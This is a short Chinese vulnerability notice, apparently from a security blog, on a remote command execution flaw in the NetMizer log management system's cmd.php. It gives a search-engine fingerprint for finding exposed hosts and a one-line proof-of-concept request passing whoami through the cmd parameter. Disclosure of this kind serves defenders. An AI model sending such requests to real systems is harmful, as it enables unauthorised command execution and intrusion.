NetMizer 日志管理系统 cmd.php 远程命令执行漏洞

漏洞描述

NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行。

漏洞影响

NetMizer 日志管理系统

网络测绘

title=”NetMizer 日志管理系统”

漏洞复现

登录页面

20240327112856168-1628834857867-6694d560-2345-49e8-9460-2296c316a7a3.4a6f6ca7_2024-03-27_11-28-30 (1)

验证POC

/data/manage/cmd.php?cmd=whoami

20240328105725213-1637918595617-0674c271-9040-4d74-acc4-1e0c1d71ab7c.b0a0e60c_2024-03-28_10-56-42 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容